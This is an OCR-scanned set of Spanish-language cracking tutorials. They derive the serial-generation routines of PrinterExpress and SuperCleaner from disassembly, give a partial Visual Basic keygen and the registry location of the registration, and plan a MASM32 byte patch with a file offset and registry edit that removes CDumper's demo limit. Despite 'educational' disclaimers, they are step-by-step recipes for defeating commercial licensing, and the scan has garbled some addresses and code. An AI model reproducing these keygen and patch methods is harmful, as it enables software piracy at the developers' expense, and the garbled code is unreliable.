DOWNLOAD: 


Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 1999-2002 


Printer Express v1.0 


Name / Serial 
Hacer un Keygen 


PrinterExpress es un programa muy útil para todo aquel que trabaja con diferentes 
impresoras en una red. 


Novato. 


http://www. SouthByPC.com 


TRW2000, W32dasm 


ByTESCRK FECHA: 26/11/2001 


INTRODUCCION 


Bueno, pues aquí estamos nuevamente para ver una protección más esta básicamente es la misma 
que tiene el SuperCleaner y algunos otros productos de esta empresa, algunos que hasta hace algún 
tiempo habian sido gratuitos, ahora ya van desde los $8 a los 20$. 


Bueno así pudieramos seguir hablando de muchas cosas sobre los productos que realmente esta 
introducción se haría bastante larga, lo importante del caso es que... 


"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas 
de manera educacional y tambien como diversión, si te gusta, este producto por favor 
COMPRALO, algunas veces... los autores merecen su dinero ;o)" 


AL ATAKE 


Carguemos el programa y hacemos clic en Enter Code... sale otra ventana y nos dice que ingresemos nuestro 
nombre y el código, en mi caso los de siempre, hacemos clic en OK y el error 


Incorrect registration code! 


Abrimos el W32DASM y vamos a buscar esto en las cadenas de referencia luego de desensamblar el 
programa y encontramos esto al hacer doble clic en la cadena... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:00402B1F(C) <= Investigaremos por aqui 


| 
:00402B71 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"PrinterExpress" 


| 
:00402B73 6870904000 push 00409070 


* Possible StringData Ref from Data Obj ->"Incorrect registration code!" 


| 
:00402B78 6840924000 push 004092A0 <= Aquí caemos 
:00402B7D 56 push esi 


* Reference To: USER32.MessageBoxA, Ord:01C3h 

| 

:00402B7E FF15A8714000 Call dword ptr [004071A8] 

* Possible Reference to String Resource ID=00001: "Registered to " 


| 

:00402B84 B801000000 mov eax, 00000001 
:00402B89 5E pop esi 

:00402B8A 810400020000 add esp, 00000200 
:00402B90 C21000 ret 0010 


Al ir a 00402B1F nos encontramos con esto... 


:00402B12 50 push eax 

:00402B13 51 push ecx 

:00402B14 E867020000 call 00402D80 <= Aqui se genera y compara el serial 
:00402B19 83C408 add esp, 00000008 

:00402B1C 85C0 test eax, eax 

:00402B1E 5F pop edi 

:00402B1F 7450 je 00402B71 <= Aqui llegamos 

:00402B21 8D542404 lea edx, dword ptr [esp+04] 


Abrimos TRW y ponemos un punto de ruptura en 00402B14, luego de que hayamos ingresado nuestros datos 
hacemos clic en OK y automáticamente salta el TRW y llegamos aqui. 


:00402D80 81EC00010000 sub esp, 00000100 

:00402D86 A070B74000 mov al, byte ptr [0040B770] 
:00402D8B 56 push esi 

:00402D8C 57 push edi 

:00402D8D 88442408 mov byte ptr [esp+08]1, al 
:00402D91 B93F000000 mov ecx, 0000003F 

:00402D96 33C0 xor eax, eax 

:00402D98 8D7C2409 lea edi, dword ptr [esp+09] 
:00402D9C 8B94240C010000 mov edx, dword ptr [esp+0000010C] 
:00402DA3 F3 repz 

:00402DA4 AB stosd 

:00402DA5 66AB stosw 

:00402DA7 8D4C2408 lea ecx, dword ptr [esp+08] 
:00402DAB 51 push ecx 

:00402DAC 52 push edx 

:00402DAD AA stosb 

:00402DAE E83D010000 call 00402EFO <= Entramos aquí 
:00402DB3 8BB42418010000 mov esi, dword ptr [esp+00000118] 
:00402DBA 56 push esi 

:00402DBB E890000000 call 00402E50 

:00402DC0 8D442414 lea eax, dword ptr [esp+14] 


Al entrar en la rutina vemos esto... 


:00402EFO 81£C00010000 sub esp, 00000100 
:00402EF6 A070B74000 mov al, byte ptr [0040B770] 
:00402EFB 53 push ebx 

:00402EFC 55 push ebp 


:00402F1A 57 push edi 

:00402F1B FF15CC704000 Call dword ptr [004070CC] <= Cuenta el tamaño del nombre 
:00402F21 8BFO mov esi, eax 

:00402F23 33C9 xor ecx, ecx 

:00402F25 33C0 xor eax, eax 

:00402F27 85F6 test esi, esi 

:00402F29 7E13 jle 00402F3E 

:00402F2B 8B1590924000 mov edx, dword ptr [00409290] <= Asigna el valor de 18h a EDX 
:00402F31 OFBE1C38 movsx ebx, byte ptr [eax+edi] <= Extrae letra por letra 

:00402F35 03DA add ebx, edx <= EBX = EBX + EDX 

:00402F37 03CB add ecx, ebx <= ECX = ECX + EBX 

:00402F39 40 inc eax <= Incrementa EAX en 1 

:00402F3A 3BC6 cmp eax, esi <= Compara si se ha completado el nombre 

:00402F3C 7CF3 jl 00402F31 <= Si no regresa a 00402F31 

:00402F3E 8B9C2418010000 mov ebx, dword ptr [esp+00000118] 

:00402F45 51 push ecx <= ECX a memoria 

:00402F46 68D4924000 push 004092D4 

:00402F4B 53 push ebx 

:00402F4C FF151C714000 Call dword ptr [0040711C] <= Se agrega un guión al valor ECX en dec ej. NNN- 
:00402F52 83C40C add esp, 0000000C 

:00402F55 33C9 xor ecx, ecx 

:00402F57 33C0 xor eax, eax 

:00402F59 85F6 test esi, esi 

:00402F5B 7E14 jle 00402F71 

:00402F5D 8B1594924000 mov edx, dword ptr [00409294] <= Se le asigna el valor de 27h a EDX 
:00402F63 OFBE2C38 movsx ebp, byte ptr [eax+edi] <= Extrae letra por letra 

:00402F67 OFAFEA imul ebp, edx <= EBP = EBP * EDX 

:00402F6A 03CD add ecx, ebp <= ECX = ECX + EBP 

:00402F6C 40 inc eax <= Incrementa EAX en 1 

:00402F6D 3BC6 cmp eax, esi <= Compara si se ha completado el nombre 

:00402F6F 7CF2 jl 0O402F63 <= Si no regresa a 00402F63 

:00402F71 51 push ecx 

:00402F72 8D4C2414 lea ecx, dword ptr [esp+14] 

:00402F76 68D4924000 push 004092D4 

:00402F7B 51 push ecx 

:00402F7C FF151C714000 Call dword ptr [0040711C] <= Se agrega un guión al valor ECX en dec 25233- 
:00402F82 83C40C add esp, 0000000C 

:00402F85 8D542410 lea edx, dword ptr [esp+10] <= Valor de ECX más el guión (25233-) 
:00402F89 52 push edx 

:00402F8A 53 push ebx 

:00402F8B FF15D0704000 Call dword ptr [004070D0] <= Se concatenan los valores NNN-25233- 
:00402F91 33C9 xor ecx, ecx 

:00402F93 33C0 xor eax, eax 

:00402F95 85F6 test esi, esi 

:00402F97 7E13 jle 00402FAC 

:00402F99 8B1598924000 mov edx, dword ptr [00409298] <= Se le asigna el valor de 1Ah a EDX 
:00402F9F OFBE2C38 movsx ebp, byte ptr [eax+edi] <= Extrae letra por letra 

:00402FA3 03EA add ebp, edx <= EBP = EBP + EDX 

:00402FA5 03CD add ecx, ebp <= ECX = ECX + EBP 

:00402FA7 40 inc eax <= Incrementa EAX en 1 

:00402FA8 3BC6 cmp eax, esi <= Compara si se ha completado el nombre 

:00402FAA 7CF3 jl 00402F9F <= Si no regresa a 00402F9F 

:00402FAC 51 push ecx 

:00402FAD 8D442414 lea eax, dword ptr [esp+14] 

:00402FB1 68D4924000 push 004092D4 

:00402FB6 50 push eax 

:00402FB7 FF151C714000 Call dword ptr [0040711C] <= Se agrega guión al valor de ECX en decimal 
:00402FBD 83C40C add esp, 0000000C 

:00402FCO 8D4C2410 lea ecx, dword ptr [esp+10] 

:00402FC4 51 push ecx 

:00402FC5 53 push ebx 


:00402FC6 FF15D0704000 Call dword ptr [004070D0] <= Se unen los valores NNN-25233-855- 
:00402FCC 33C9 xor ecx, ecx 

:00402FCE 33C0 xor eax, eax 

:00402FDO 85F6 test esi, esi 

:00402FD2 7E14 jle 00402FE8 

:00402FD4 8B159C924000 mov edx, dword ptr [0040929C] <= Se le asigna el valor de 01h a EDX 
:00402FDA OFBE2C38 movsx ebp, byte ptr [eax+edi] <= Extrae letra por letra 

:00402FDE OFAFEA imul ebp, edx <= EBP = EBP * EDX 

:00402FE1 03CD add ecx, ebp <= ECX = ECX + EBP 

:00402FE3 40 inc eax <= Incrementa EAX en 1 

:00402FE4 3BC6 cmp eax, esi <= Compara si se ha completado el nombre 

:00402FE6 7CF2 jl 0O402FDA <= Si no regresa a 00402FDA 

:00402FE8 51 push ecx 

:00402FE9 8D542414 lea edx, dword ptr [esp+14] 

:00402FED 68D0924000 push 004092DO 

:00402FF2 52 push edx 

:00402FF3 FF151C714000 Call dword ptr [0040711C] <= Se transforma el valor a decimal 
:00402FF9 83C40C add esp, 0000000C 

:00402FFC 8D442410 lea eax, dword ptr [esp+10] 

:00403000 50 push eax 

:00403001 53 push ebx 

:00403002 FF15D0704000 Call dword ptr [004070D0] <= Se unen los valores NNN-25233-855-647 
:00403008 5F pop edi 

:00403009 5E pop esi 

:0040300A 5D pop ebp 

:0040300B 5B pop ebx 

:0040300C 81C400010000 add esp, 00000100 

:00403012 C3 ret 


Eso es todo, ahora puedes disfrutar del programa sin molestos recordatorios, tan solo este que te doy... 
"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas de 
manera educacional y tambien como diversión, si te gusta, este producto por favor COMPRALO, 
algunas veces... los autores merecen su dinero ;o)" 


Saludos a mis buenos amigos Karpoff, Profesor_X, CaoS ReptantE y a todos los crackers hispanohablantes, 
en especial a ti por que has llegado hasta una vez más hasta aquí. 


Si tienes alguna duda o comentario escríbeme a: ByTESCRKOiespana.es 


ByTESCRK 
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Karpoff Spanish Tutor 1999-2002 


SuperCleaner v 2.21 


limite de trabajo a 30 días 


Obtener un número de serie válido y hacer el generador 


Aficionado 


http://www.southbaypc.com 


File Inspector , Softl ce 
OGZRIP FECHA: 01/04/2002 


INTRODUCCION 


NOTA: Lo que aquí se expresa es sólo con fines educativos. El divulgar conocimientos no puede 
hacerme responsable del uso que se le quiera dar a este material. Así que disfrutalo , destripalo y 
finalmente , compraló ( si puedes ). 


Hola amigos!! esta vez se trata de como muy bien indica su nombre de un programa para borrar 
ficheros indeseados llamado SuperCleaner v 2.21. Es bastante configurable permitiendonos además 
eliminar las molestas "cookies" dejadas siempre por | nternet. 


AL ATAKE 


Vamos como siempre a utilizar el File Inspector para saber con que nos enfrentamos. 


gu file insPE ctor XL al ES 


Pa Modificar ú Herramientas | 27 Plug-Ins | <A Procesos | he] Acerca de... | 
E cabezerape | [5%] cabezeramz |] (secciones | +9 Funciones (8 Compilador 


Compilador /Compresor/Protector 


Microsoft Visual C++ 6.0 

Signatura; < 55 88 EC 64 FF 68 EO 94 41 00 68 FO 45 41 0064 41 
00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 CodeDaemon 
89 65 ES FF 1560 91 41 00 33 > 


B Info... 


J” Permitir análisis heurístico 


Versión del SO; 0] Versión de la imágen: fo.o 
Versión del enlazador: [6.0 Versión del subsistema: [4.0 


[ms] [2 Abrir archivo + Lo Analizar p Salir 
C:¡APrueba'SuperCleanerSuperCleaner.exe | 0,27 secs. 


Está hecho con Microsoft Visual C++ 6.0. Ahora vamos a la pestaña Secciones para saber si tiene algún tipo de 
protección anti - Desensamblado 


4d file insPE ctor XL Ta ES 


ES Modificar | Uf Herramientas | 2 Plug-Ins | <> Procesos | 10 acerca de... | 
dE Cabezera PE | [5] Cabezera M2 L*] Secciones | :S Funciones | e Compilador | 


Mame | Virtual Address | Virtual Size | Phisic Address | Phisic Size | Characteristics 


L£] text 00001000 00017FCC 00001000 00015000 60000020 
(3 .rdata 00019000 DODO1FEE 00019000 00002000 40000040 
(O data 00016000 0000667C 00016000 00005000 C0000040 
A rsre 00022000 00036008 00020000 00037000 40000040 


¡ e MEA de 
[pe Sections +] 8 Alinear sección 4 Yolcar sección 2 Añadir Sección 


0 [3 Abrir archivo y 3 Analizar p Salir 
CAPruebaSuperCleanerSuperCleaner. exe 0,27 secs. 


Como veis no tiene nada que nos impida su desensamblado o el trabajar con el Softl ce así que le vamos a 
arrancar para ver que nos cuenta : 


You may use this trial version free for 30 days. After the 30 day trial period is over, 
certain features will be disabled. If you wish to continue using SuperCleaner after 
the trial period has ended, click on the "Purchasing Info" button below. 


LN What You Get When You Order 


You will receive a code that will unlock SuperCleaner, and activate all of its features 
The code will be sent to you via e-mail, immediately following your purchase 


Future versions and upgrades to this product are free to registered users 
Secure Ordering 


All purchases made online use the latest encryption technology, 
so your credit card information is kept safe and protected 


Puctasg o 


Vamos a intentar registrarnos para lo cual picamos sobre el botón Enter Registration con lo que nos aparece la 
típica ventana de registro : 


If you paid the registration fee and have received a registration 
code, enter the name and code in the spaces provided exactly as 
they appear in the registration information that was sent to you. 


Name: [26ZRiP 
Code [1234567890 


Concal_| 


Pulsamos sobre el boton Ok e inmediatamente nos comunica que como siempre nos hemos equivocado al 
meter nuestros datos 


SuperCleaner EZ 


Sorry, you have entered an incorrect registration code. 


Carguemos el programa con el Loader del Softl ce y pongamos los Breakpoints pertinentes , yo suelo poner : " 
GetDlgltemTexta , MessageBoxA y GetWindowTexta " pero aunque caemos en Softl ce con GetDlgl temTexta 
empiezo a dar vueltas y nos consigo mucho así que utilizaré el que casi nunca falla " Hmemcpy " Cuando salte 
al Softl ce damos una vez en F5 para saltar el nombre y a continuación damos F12 todas las veces necesarias 
hasta llegar al cuerpo del programa cosa que ya nos indica el mismo Softl ce cuando en la parte inferior de la 
ventana de desensamblado aparece algo como SUPERCLEANER!.Text + AD17 . 


0040BD19 . 8D84240801000 LEA EAX,DWORD PTR SS:[ESP+108] <---- Caemos aquí (Nuestro número) 


0040BD20 . 8D4C2408 LEA ECX,DWORD PTR SS:[ESP+-8] <---- Nuestro nombre 
0040BD24 . 50 PUSH EAX 
0040BD25 . 51 PUSH ECX 


0040BD26 . E345080000 CALL 00400570 


Como veis carga en los registros EAX y ECX nuestro número y nuestro nombre respectivamente , a 
continuación los guarda en la pila y hace una llamada. Vamos, lo típico en una rutina de generación de un 
número , asi que vamos a entrar en dicha llamada con F8: 


0040C570 .81EC00010000 SUB ESP,100 
0040C576 .A074F14100 MOV AL,BYTE PTR DS:[41F174] 


0040C57B .57 PUSH EDI 

0040C57C .88442404 MOV BYTE PTR SS:[ESP+4],AL 
0040C580 .B93F000000 MOV ECX,3F 

0040C585 .33C0 XOR EAX,EAX 

0040C587 .8D7C2405 LEA EDI,DWORD PTR SS:[ESP+5] 
0040C58B .F3AB REP STOS DWORD PTR ES:[EDI] 
0040C58D .8B942408010000 MOV EDX,DWORD PTR SS:[ESP+108] 
0040C594 .8D4C240 LEA ECX,DWORD PTR SS:[ESP+4] 
0040C598 .66AB STOS WORD PTR ES:[EDI] 

0040C59A .51 PUSH ECX 

0040C59B .52 PUSH EDX 

0040C59C .AA STOS BYTE PTR ES:[EDI ] 

0040C59D .E8AE000000 CALL 0040C650 <---- Rutina que genera número de serie 
0040C5A2 .8B8C241401000 MOV ECX,DWORD PTR SS:[ESP+114] 
0040C5A9 .83C408 ADD ESP,8 

0040C5AC .8D442404 LEA EAX,DWORD PTR SS:[ESP+4] 
0040C5B0 .50 PUSH EAX 

0040C5B1 .51 PUSH ECX 

0040C5B2 .FF15F8914100 CALL DWORD PTR DS:[] 

0040C5B8 .F7D8 NEG EAX 

0040C5BA .1BCO SBB EAX,EAX 

0040C5BC .5F POP EDI 

0040C5BD .40 INC EAX 

0040C5BE .81C400010000 ADD ESP,100 

0040C5C4 .C3 RET 


Después de ejecutar con F10 la rutina que genera el dichoso numerito vemos que ha variado el registro EAX 
por lo que haciendo un sencillo D EAX obtenemos el número de serie válido para el correspondiente nombre 
que yo he metido. En este caso 720-xxxxxX-yyy-ZZZZ. 

¿ Porqué digo esto ? es facil averiguar que lo genera siempre en función del nombre que se introduce , ¿ 
como? pues entrando en dicha rutina y trabajando en ella . 


Primera parte del número : 


Nombre ASCII Operación Número "X" Parcial Total 


O 64 + 38 102 102 
G 71 + 38 109 211 
Z 80 + 38 118 329 
R 82 + 38 120 449 
1 105 + 38 143 592 
Z 90 + 38 128 720 


Como veis ya hemos descubierto de donde saca la primera parte del número. Coge el valor ASCII de cada uno 
de los caracteres introducidos como nombre ( espacios incluidos ) los va sumando uno a uno a un número que 
en esta tabla yo he llamado Número "X" que es dado por el programa ( 38 en este caso ) y luego va sumando 
los distintos resultados. 

Aún nos quedaría por encontrar las otras 3 partes del número de série válido , pero eso ya lo dejo para que lo 
hagais vosotros , os aseguro que es bastante facil el ver como lo hace solamente teneis que ir siguiendo el 
código . 

Bueno pues vamos a meter el número encontrado para ver si efectivamente nos registra , como veis no nos 
dice en absoluto si hemos acertado o fallado , pero si cerrais el programa y volveis a arrancarlo ya no saca la 
primera pantalla donde nos pedia registrarnos y nos decia cuantos dias de prueba quedaban . 

Por último solo nos queda ver en donde guarda dicho registro , lo localizamos en : 


HKEY_CURRENT_USERI Softwarel SuperCleaner Registration 


Code 720-xxxXX-YYY-ZZZZ 
Name OGZRIP 


Por descontado si borramos las claves volveremos a estar con el programa sin registar. 


Generador de claves 


Private Sub Generador_Click() 

Dim user_name As String 

Dim L As Integer, x As Integer 

Dim key1 As Double, key2 As Double, key3 As Double, key4 As Double 
user_name = Text1.Text 

L = Len(user_name) 


x=0 

key1 = 0 
key2 = 0 
key3 = 0 
key4 = 0 
For x = 1 To L 


user_name = Asc(Mid$(Textl.Text, x, 1)) + 38 

keyl1 = key1 + user_name 

user_name = Asc(Mid$(Text1.Text, x, 1)) * xx “El número xx lo teneis que descubrir , lo siento 
key2 = key2 + user_name 

user_name = Asc(Mid$(Text1.Text, x, 1)) + yy “El número yy lo teneis que descubrir , lo siento 
key3 = key3 + user_name 

user_name = Asc(Mid$(Text1.Text, x, 1)) * zz “El número zz lo teneis que descubrir , lo siento 
key4 = key4 + user_name 

Next x 

For x = 1 To L 

If Asc(Mid$(Text1.Text, x, 1)) > 126 Then “Al utilizar la función ADD que no tiene en cuenta el acarreo da 
errores si pasamos de códigos mayores de 126 

MsgBox "Nombre no válido , sólo números y letras sin acentuar, vbExclamation" 

Text2.Text = "" 

Exit For 

Else 

Text2.Text = CStr(keyl 6 "-" € key2 € "-" € key3 € "-" € key4) 'Visualizamos el Serial 

End If 

Next x 

End Sub 

Private Sub Exit_ Click() 

End 

End Sub 


CONCLUSIONES 


Espero que lo hayais entendido , he de reconocer que me cuesta bastante más el hacer el tutorial en sí que 
desproteger el programa , cada día me parece más " coñero " esto del HTML. Como siempre si quereis 


preguntarme algo me encontrareis aquí : OGZRIP . Un abrazo. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 
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Programa: | CDumper v1.0 


PROTECCION: Simular estar registrados mediante un patch. 


Descripcion: Reproductor de CDs con ecualizador de sonido. 


Dificultad: Novato, Facililla, Media, Avanzado, Difícil, Elite, 
DOWNLOAD: http: //www.gmixon.com 


Para el patch: W32dasm y MASM32. 
Para el KeyGen: File Inspector, DeDe 3.0, SoftICE, las anteriores. 


Herramientas: 


crac: SACCOPHARYNX — rrcmn: [15/02/2002 


INTRODUCCION 


Saludos a todos: 


Aquí tienen mi cuarto tutorial, el primero de este 2002. Antes que nada, 
a todos los colegas que me mandaron e-mails acerca de mis tutoriales 
anteriores, les quiero decir gracias por invertir su tiempo en aprender 


con ellos. Me alegro que les hayan servido, y que les haya gustado la 
explicación en los mismos. Bueno amigos, manos a la obra, JeJejJe... 


AL ATAKE 


Intro 


Creo que a esta víctima (CDumper v1.0) le tenía ganas desde mucho antes de 
introducirme en este hermoso mundo del cracking. Obviamente mi falta de conocimientos 
en aquel entonces solo produjo resultados sin éxito, por eso estoy aquí nuevamente, 
en busca de la revancha para que los programadores de CDumper no se la lleven de 
arriba. 


Presentando a la víctima 


Como con los reproductores comunes de CDs (Windows Media Player, Winamp, CDplayer, 
etc), solo podemos reproducir el sonido de un CD, y no ecualizarlo a nuestro gusto, 
es que he seleccionado a esta víctima, con la cual podemos lograr esto. 


Pero, cómo con CDumper v1.0 sí y con los comunes no? 


Bueno, es sencillo. Los reproductores comunes de CD sólo ponen en PLAY la unidad de 
CD-ROM y no procesan ninguna señal. El audio sale a través del cable que va conectado 
desde nuestra unidad de CD-ROM a la placa de sonido, y de esta va directamente a los 
parlantes. O sea, la CPU no procesa nada. Esta maravilla de programa trabaja de forma 
distinta. Si eliminamos el cable que va desde nuestra unidad de CD-ROM a la placa de 
sonido, oiremos música igual. Por qué? Porque este programa lo que hace en realidad 
es una EXTRACCION DIGITAL DE AUDIO (lo mismo que los programas que graban CDs). El 
sonido en lugar de salir por el cable que va a la placa de sonido, sale por el bus de 
datos, luego es procesado según nuestras preferencias seteadas en el ecualizador, y 
luego se manda la señal ya procesada a la placa de sonido. Es por eso que podremos 
disfrutar de nuestros CDs a pleno. 


Fanáticos de la música no se pierdan este tutorial. 


Manos a la obra 


Bueno, el objetivo de este tutorial es aprender un poco acerca de las APIs de Window$ 
que controlan la registry, para usar esos conocimientos en la realización de un patch 
en assembler, para simular que estamos registrados. Este patch no solo escribe una 
entrada en la resgistry, sino que también parchea unos bytes en CDumper.exe. El patch 
lo haremos en MASM32, por lo tanto recomiendo bastantes conocimientos de assembler 
para que este tutorial no resulte muy difícil. Igualmente tartaré de explicar de la 
mejor manera posible. Luego, al final, les mostraré que existe otro punto de ataque, 
pero la idea de este tutorial es hacer algo distinto a lo que venimos haciendo y 
programar un poco más. 


Pero antes de hacer un patch debemos conocer como trabaja nuestra víctima. Entonces 
vamos a inspeccionarla. 


Una vez que instalamos el CDumper v1.0 ponemos un CD de audio en nuestra lectora de 
CDs y ejecutamos el programa. Ni bien hacemos esto ya aparece la primera nag 
molestándonos: 


AA xl 
This is a demo version of CDumper. 
You will be allowed to play the first 3 CDs that you load as many times as you want. 


la cual nos dice que es una versión demo y que sólamente podremos reproducir tres 
CDs, las veces que queramos, pero solo tres. Con mi extensa colección de CDs, solo 
reproducir tres? jejejejeje, qué cargada es esa? 


Si analizamos un poco la situación, es obvio que en algún lugar se guardan la 
cantidad de CDs reproducidos y algún identificadr de los mismos para saber cuales 
fueron reproducidos y cuales no. Si buscamos en el directorio dónde instalamos 
CDumper no hay rastros, por lo tanto vamos a la REGISTRY. Para los que no tengan idea 
de lo que es la registry, ojo con lo que hacen de ahora en más, no arruinen su 
Window$, Jejeje. 


Vamos a Inicio->Ejecutar, escribimos regedit seguido de ENTER, y accedemos al editor 
de la registry de Window$. Una vez aquí vamos a HKEY_LOCAL MACHINEXSOFTWARE y veremos 
que nuestra víctima generó una entrada llamada GMixon y otras más que dependen de 
esta: 


2. Editor del Begístro _- HA E [aj xj 
Registo Edición Wer Favontos Ayuda 
E GMixon m7 
5-4 CDumper 
a Y 
6-4 CD Devices 
(Y CD Device_CD-AB5S (0: 


[valor no establecido] 
01 00 00 00 38 00 00 00 3: 
DataCount Ox00000055 (85) 

22] Demohsg 0x00000001 (1) 


i Po CD Device_CD-ROM CD-532€ 1 53) 0x00009166 (37302) 
p emo 
(Y Karaoke 
¿(E Sound Devices 
5-44 CDumper Demo 


da (3 1.0 y 
4 » 


Mi PCIHKEY_LOCAL_MACHINENSOFTWAREAGMixoniCDumperiDemo L 


Si observan bien, la entrada con los datos más interesantes es 
HKEY_LOCAL_ MACHINEXSOFTWAREAMGMixonxCDumperiDemo (la que se observa en la imagen de 
arriba): 


Data => El primer dato de este valor es 01, el cual nos indica la catidad de 
CDs que hemos reproducido ya. El resto de los datos se usan para 
identificar a los CDs, para saber si es uno nuevo o no, e 
incrementar o no, el dato 01. Es obvio que cuando se llega a 03 
fuimos historia. 


DataCount y Test => Aparentemente se usan en conjunto para hacer alguna 
especie de chequeo que muy bien no les funcionó a los 
programadores, JejejJe]Je. 


DemoMsg => Como se puede observar contiene un 1. Si cierran CDumper y lo 
ejecutan otra vez notarán que la molesta nag no aparece. Que quiere 
decir eso?, Que si DemoMsg está en 1 no debe mostrarnos nuevamente 
la nag, Jejeje. 


Ahora que ya tenemos bastante información, pensemos un poco. Nuestra víctima de 
alguna forma escribe valores en la registry de Window$. Bueno, si buscamos en nuestra 
Referencia de APIs (si no la tienen recomiendo que la bajen de internet porque es muy 
útil, http://spiff.tripnet.se/-iczelion/files/win32api.zip), la API que escribe la 


Registry es RegSetValue o RegSetValueExa. Lo que debemos hacer entonces es buscar en 
CDumper.exe donde se efectua la llamada a esta API, para lo cual lo desensamblamos 
con W32Dasm. Una vez desensamblada la víctima vamos a Search->Find Text y buscamos 
RegSetValue. 


La primer aparición no nos interesa, solo dice que es un módulo importado desde 
advapi32.d11. Buscamos otra vez dando F3 y llegamos a la segunda aparición que es 
solo un salto a la tercera y última de todas, la cual si nos interesa y mucho: 


7004A85E3 SBFO mov esi, eax 

004A85E5 8B450C mov eax, dword ptr [ebp+0C] 
:004A85E8 50 push eax 

2004A85E9 SB45FC mov eax, dword ptr [ebp-04] 
3004A85EC 50 push eax 

:004A85ED 56 push esi 

004A85EE 6400 push 00000000 

2004A85FO0 S8BC7 mov eax, edi 

3004A85F2 ESFIBAFSFF call 004040ES 

:004A485F7 50 push eax 

:004A485F8 28B4304 mov eax, dword ptr [ebx+04] 
004A85FB 50 push eax 


* Reference To: advapi32.PegSerValueExA, Ord: 0000h 
| 


Bien, como dijimos anteriormente la idea no es parchear la víctima con un editor 
Hexa, sino hacer un patch en Win32Asm con MASM32, para lo cual debemos saber que es 
lo que debemos parchear. Esta vez no vamos a andar parcheando simples saltitos (Jmp, 
je, etc). Como se habrán dado cuenta la idea es parchear la escritura de datos en la 
registry, por lo tanto antes debemos saber como funciona la API RegSetValueExa. Aquí 
les describo los parámetros que se le pasan a la misma: 


LONG RegSetValueEx ( 


HKEY hKey, // Es el handle de la entrada donde escribiremos el valor. 
LPCTSTR lpValueName, // Es la dirección del nombre del valor a escribir. 

DWORD Reserved, // Reservado para uso futuro. Le pasaremos un NULL. 

DWORD dwType, // Flag que nos indica el tipo de valor a escribir. 

CONST BYTE *lpData, // Es la dirección de los datos del valor a escribir. 
DWORD cbData // Es el tamaño de los datos del valor a escribir. 


y; 


Ahora que ya sabemos esto, si observan la llamada de la posición :004A85FC, muchos se 
preguntarán, dónde se pasan todos estos parámetros?. Bueno, si no se usa la sentencia 
invoke de MASM32, la forma de pasar los parámetros es ponerlos en la pila (stack) 
mediante sentecias push antes del call, en orden inverso debido a que en una pila, 
siempre, el último en poner es el primero en sacar. Entonces: 


:004A85E8: => Pone en la pila DWORD cbData. 
:004A85EC: => Pone en la pila CONST BYTE *lpData. 
:004A85ED: => Pone en la pila DWORD dwType. 
:004A85EE: -> Pone en la pila DWORD Reserved. 
:004A85F7: => Pone en la pila LPCTSTR l1lpValueName. 
:004A85FB: => Pone en la pila HKEY hKey. 


Luego viene el call. 


Bien, una cosa a tener en cuenta es que nuestra víctima siempre usa este código para 
escribir en la registry, porque no hay más llamadas a esta API, por lo tanto hay que 
tener cuidado como parcheamos este código, porque es obvio que afectaremos a todas 
las escrituras en la registry. Analizando la situación, creo que la mejor opción es 
pasarle un NULL en el parámetro correspondiente a CONST BYTE *lpData, porque de esta 
forma tendremos un puntero nulo que no apunta a ningún dato, entonces no se escribirá 
absolutamente nada en la registry (ningún dato para ninguno de los valores de las 
entradas generadas en HKEY_LOCAL MACHINEXNSOFTWARENMGMixonX). Para lograr esto debemos 
hacer los siguientes cambios: 


Las instrucciones: 


dirección codificación ¡instrucción 
:004A85E9  8B45FC mov eax, dword ptr [ebp-04] 
:004A85EC 50 push eax 


debemos cambiarlas por: 
dirección codificación ¡instrucción 


:004A85E9 6A00 push 00000000 
:004AB8B5EB 90 nop 
:004A85EC 90 nop 


o sea, cuatro bytes se cambian por otros cuatro bytes, para no alterar el tamaño 
del archivo (CDumper.exe): 


8B -> 6A 
45 -> 00 
Fc -> 90 
50 -> 90 


Listo, ya sabemos que hay que cambiar para lograr que no se escriban datos en la 
registry. Solo nos falta saber el desplazamiento (offset) que hay hasta los bytes que 
vamos a cambiar. Como estos bytes comienzan en la dirección :004A85E9, solo tenemos 
que posicionarnos en esta línea dentro de W32Dasm. Una vez hecho esto veremos el 
desplazamiento abajo de todo, el cual es: 


a79e9 (En hexadecimal). 
686569 (En decimal). 


Antes de hacer el patch en assembler hice los cambios con un editor Hexa y probé los 
resultados. Funcionó de maravillas, asique luego puse manos a la obra en el patch. 
Existe un pequeño costo extra al impedir que se escriban datos en los valores de las 
entradas de la registry: 


Este costo es que no se escribirá el dato del valor DemoMsg. Entonces siempre 
aparecerá esa molesta nag? Noooooooooooooooo0o0o. Claro que no. Aprovecharemos el patch 
del archivo CDumper.exe y crearemos esa entrada en la registry y le pondremos un 1 
como dato en el valor DemoMsg, Jejeje. Todo en el mismo patch, y de esa forma 
eliminaremos la molesta nag. 


Bueno, ahora que vimos como funciona nuestra víctima, vamos a desinstalarla (Inicio- 
>Panel De Control->Agregar o Quitar programas) y a borrar la entrada GMixon que 
generó en la registry. Esto lo hacemos porque en la primer ejecución, al no estar 
parcheado CDumper.exe, escribió datos en los valores de la registry, lo cual no 
queremos que suceda, Jejeje. Ahora sí, se viene el patch en assembler para Win32 
hecho con MASM32. 


Código fuente del patch y su explicación 


Antes que nada les quiero decir que los siguientes códigos fuente (rsrc.rc y 
CDumperPatch.asm) se puden bajar enteros desde aquí: CDumperPatchSrc.zip 


El primero de los códigos fuente corresponde a rsrc.rc 
El código será explicado por partes y evitaré explicar 
mismo código fuente. 


Código fuente de rsrc.rc 


y el otro a CDumperPatch.asm. 
lo que está explícito en el 


finclude "c:imasm32lincludelresource.h" 


Hdefine IDC_STATIC -1 

fdefine IDD_DIALOG 1000 

Hdefine IDC_SERIAL 1002 

Hdefine IDC_EXIT 1003 

fdefine IDC_ABOUT 1004 

fdefine IDC_CRACKEAR 1005 

app ICON gulper2.ico ¿ícono del patch 
IDD_DIALOG DIALOG 100,100,229,098 ¡tamaño del dialog box 


¡Estilo del Dialog Box 


STYLE WS_CAPTION | DS_CENTER | WS_SYSMENU |WS_MINIMIZEBOX 


CAPTION "CDumper v1.0 Patch" 


¡Tipografía y tamaño 
FONT 8, "MS Sans Serif" 


BEGIN 
GROUPBOX "Cracker", IDC_STATIC,8,6,214,20 
